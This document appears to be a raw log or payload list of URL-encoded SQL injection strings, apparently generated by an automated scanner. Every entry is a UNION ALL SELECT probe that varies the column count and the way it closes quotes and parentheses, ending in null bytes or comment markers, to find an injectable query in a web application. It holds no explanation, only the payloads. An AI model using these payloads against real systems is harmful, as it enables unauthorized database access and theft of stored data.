1234.5%27%20%2B%20%28SELECT%20%27ALXT%27%20WHERE%207307%3D7307%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tjbR%27%20WHERE%206172%3D6172%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27VhCH%27%20WHERE%201084%3D1084%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -4215%29%20UNION%20ALL%20SELECT%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%00 -6057%29%20UNION%20ALL%20SELECT%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%00 -4007%29%20UNION%20ALL%20SELECT%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%00 -4074%29%20UNION%20ALL%20SELECT%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%00 -7999%29%20UNION%20ALL%20SELECT%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%00 -6946%29%20UNION%20ALL%20SELECT%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%00 -9221%29%20UNION%20ALL%20SELECT%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%00 -9408%29%20UNION%20ALL%20SELECT%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%2C%203544%00 -1178%29%20UNION%20ALL%20SELECT%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%00 -4833%29%20UNION%20ALL%20SELECT%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%2C%204350%00 -9684%27%29%20UNION%20ALL%20SELECT%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%00 -1360%27%29%20UNION%20ALL%20SELECT%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%00 -4692%27%29%20UNION%20ALL%20SELECT%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%00 -4921%27%29%20UNION%20ALL%20SELECT%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%2C%205173%00 -2346%27%29%20UNION%20ALL%20SELECT%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%00 -2974%27%29%20UNION%20ALL%20SELECT%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%00 -1380%27%29%20UNION%20ALL%20SELECT%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%2C%208831%00 -3908%27%29%20UNION%20ALL%20SELECT%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%00 -3164%27%29%20UNION%20ALL%20SELECT%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%2C%205084%00 -3284%27%29%20UNION%20ALL%20SELECT%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%2C%201742%00 -7052%27%20UNION%20ALL%20SELECT%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%00 -9878%27%20UNION%20ALL%20SELECT%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%00 -6126%27%20UNION%20ALL%20SELECT%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%00 -8663%27%20UNION%20ALL%20SELECT%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%00 -7116%27%20UNION%20ALL%20SELECT%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%2C%205432%00 -7202%27%20UNION%20ALL%20SELECT%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%00 -9090%27%20UNION%20ALL%20SELECT%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%00 -8939%27%20UNION%20ALL%20SELECT%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%2C%205272%00 -9548%27%20UNION%20ALL%20SELECT%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%00 -7101%27%20UNION%20ALL%20SELECT%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%2C%209353%00 -5490%22%20UNION%20ALL%20SELECT%208889%2C%208889%2C%208889%2C%208889%2C%208889%2C%208889%2C%208889%2C%208889%2C%208889%2C%208889%2C%208889%00 -4260%22%20UNION%20ALL%20SELECT%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%00 -6332%22%20UNION%20ALL%20SELECT%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%2C%203742%00 -8788%22%20UNION%20ALL%20SELECT%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%2C%207620%00 -3485%22%20UNION%20ALL%20SELECT%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%2C%206371%00 -8402%22%20UNION%20ALL%20SELECT%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%00 -8636%22%20UNION%20ALL%20SELECT%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%00 -3871%22%20UNION%20ALL%20SELECT%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%2C%209745%00 -8502%22%20UNION%20ALL%20SELECT%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%00 -3816%22%20UNION%20ALL%20SELECT%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%00 -7002%29%20UNION%20ALL%20SELECT%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%00%20AND%20%289969%3D9969 -9000%29%20UNION%20ALL%20SELECT%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%2C%201237%00%20AND%20%281509%3D1509 -5322%29%20UNION%20ALL%20SELECT%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%2C%204031%00%20AND%20%288511%3D8511 -2677%29%20UNION%20ALL%20SELECT%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%2C%207426%00%20AND%20%285738%3D5738 -8910%29%20UNION%20ALL%20SELECT%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%00%20AND%20%285974%3D5974 -4034%29%20UNION%20ALL%20SELECT%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%2C%204185%00%20AND%20%285341%3D5341 -8590%29%20UNION%20ALL%20SELECT%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%2C%203820%00%20AND%20%287378%3D7378 -8884%29%20UNION%20ALL%20SELECT%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%00%20AND%20%286584%3D6584 -6115%29%20UNION%20ALL%20SELECT%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%00%20AND%20%282392%3D2392 -8167%29%20UNION%20ALL%20SELECT%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%2C%204513%00%20AND%20%289009%3D9009 -7654%29%29%20UNION%20ALL%20SELECT%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%00%20AND%20%28%288990%3D8990 -3482%29%29%20UNION%20ALL%20SELECT%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%2C%204181%00%20AND%20%28%289401%3D9401 -9852%29%29%20UNION%20ALL%20SELECT%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%2C%207950%00%20AND%20%28%281563%3D1563 -9494%29%29%20UNION%20ALL%20SELECT%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%00%20AND%20%28%289310%3D9310 -3467%29%29%20UNION%20ALL%20SELECT%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%2C%207259%00%20AND%20%28%284034%3D4034 -7094%29%29%20UNION%20ALL%20SELECT%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%2C%209669%00%20AND%20%28%281704%3D1704 -6359%29%29%20UNION%20ALL%20SELECT%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%00%20AND%20%28%287268%3D7268 -9145%29%29%20UNION%20ALL%20SELECT%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%2C%202009%00%20AND%20%28%282975%3D2975 -5961%29%29%20UNION%20ALL%20SELECT%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%00%20AND%20%28%284215%3D4215 -5362%29%29%20UNION%20ALL%20SELECT%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%2C%207940%00%20AND%20%28%282024%3D2024 -1517%29%29%29%20UNION%20ALL%20SELECT%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%00%20AND%20%28%28%289484%3D9484 -9710%29%29%29%20UNION%20ALL%20SELECT%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%2C%203884%00%20AND%20%28%28%282802%3D2802 -8073%29%29%29%20UNION%20ALL%20SELECT%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%2C%203349%00%20AND%20%28%28%281211%3D1211 -9973%29%29%29%20UNION%20ALL%20SELECT%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%2C%202017%00%20AND%20%28%28%286429%3D6429 -3184%29%29%29%20UNION%20ALL%20SELECT%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%2C%207234%00%20AND%20%28%28%285043%3D5043 -9414%29%29%29%20UNION%20ALL%20SELECT%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%00%20AND%20%28%28%289593%3D9593 -8912%29%29%29%20UNION%20ALL%20SELECT%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%00%20AND%20%28%28%284644%3D4644 -7198%29%29%29%20UNION%20ALL%20SELECT%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%2C%208367%00%20AND%20%28%28%283845%3D3845 -5459%29%29%29%20UNION%20ALL%20SELECT%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%2C%208921%00%20AND%20%28%28%284289%3D4289 -2383%29%29%29%20UNION%20ALL%20SELECT%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%00%20AND%20%28%28%283407%3D3407 -2984%20UNION%20ALL%20SELECT%201917%2C%201917%2C%201917%2C%201917%2C%201917%2C%201917%2C%201917%2C%201917%2C%201917%2C%201917%2C%201917%00 -8320%20UNION%20ALL%20SELECT%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%00 -9163%20UNION%20ALL%20SELECT%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%00 -7177%20UNION%20ALL%20SELECT%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%00 -8710%20UNION%20ALL%20SELECT%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%00 -6015%20UNION%20ALL%20SELECT%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%2C%201652%00 -7282%20UNION%20ALL%20SELECT%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%00 -2518%20UNION%20ALL%20SELECT%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%00 -8572%20UNION%20ALL%20SELECT%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%2C%208874%00 -5904%20UNION%20ALL%20SELECT%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%00 -8841%27%29%20UNION%20ALL%20SELECT%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%00%20AND%20%28%27uYwd%27%3D%27uYwd -4350%27%29%20UNION%20ALL%20SELECT%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%2C%201719%00%20AND%20%28%27rCiI%27%3D%27rCiI -5716%27%29%20UNION%20ALL%20SELECT%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%00%20AND%20%28%27Twcj%27%3D%27Twcj -2155%27%29%20UNION%20ALL%20SELECT%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%00%20AND%20%28%27vSVC%27%3D%27vSVC -7009%27%29%20UNION%20ALL%20SELECT%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%00%20AND%20%28%27nUwU%27%3D%27nUwU -8701%27%29%20UNION%20ALL%20SELECT%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%00%20AND%20%28%27WksG%27%3D%27WksG -9573%27%29%20UNION%20ALL%20SELECT%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%00%20AND%20%28%27cZHe%27%3D%27cZHe -4972%27%29%20UNION%20ALL%20SELECT%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%2C%206614%00%20AND%20%28%27YrbE%27%3D%27YrbE -6015%27%29%20UNION%20ALL%20SELECT%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%00%20AND%20%28%27MlAn%27%3D%27MlAn -8458%27%29%20UNION%20ALL%20SELECT%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%2C%203931%00%20AND%20%28%27hCmU%27%3D%27hCmU -8531%27%29%29%20UNION%20ALL%20SELECT%207178%2C%207178%2C%207178%2C%207178%2C%207178%2C%207178%2C%207178%2C%207178%2C%207178%2C%207178%2C%207178%00%20AND%20%28%28%27RbVA%27%3D%27RbVA -7635%27%29%29%20UNION%20ALL%20SELECT%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%00%20AND%20%28%28%27aJdu%27%3D%27aJdu -5528%27%29%29%20UNION%20ALL%20SELECT%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%00%20AND%20%28%28%27fmOM%27%3D%27fmOM -9583%27%29%29%20UNION%20ALL%20SELECT%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%2C%205179%00%20AND%20%28%28%27paTE%27%3D%27paTE -5318%27%29%29%20UNION%20ALL%20SELECT%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%00%20AND%20%28%28%27BRVx%27%3D%27BRVx -8566%27%29%29%20UNION%20ALL%20SELECT%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%2C%206384%00%20AND%20%28%28%27UORY%27%3D%27UORY -9275%27%29%29%20UNION%20ALL%20SELECT%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%2C%205767%00%20AND%20%28%28%27LUeF%27%3D%27LUeF -2199%27%29%29%20UNION%20ALL%20SELECT%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%00%20AND%20%28%28%27ipJn%27%3D%27ipJn -3085%27%29%29%20UNION%20ALL%20SELECT%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%2C%204637%00%20AND%20%28%28%27eVrH%27%3D%27eVrH -9879%27%29%29%20UNION%20ALL%20SELECT%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810%00%20AND%20%28%28%27lXgq%27%3D%27lXgq -9126%27%29%29%29%20UNION%20ALL%20SELECT%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%00%20AND%20%28%28%28%27WnSH%27%3D%27WnSH 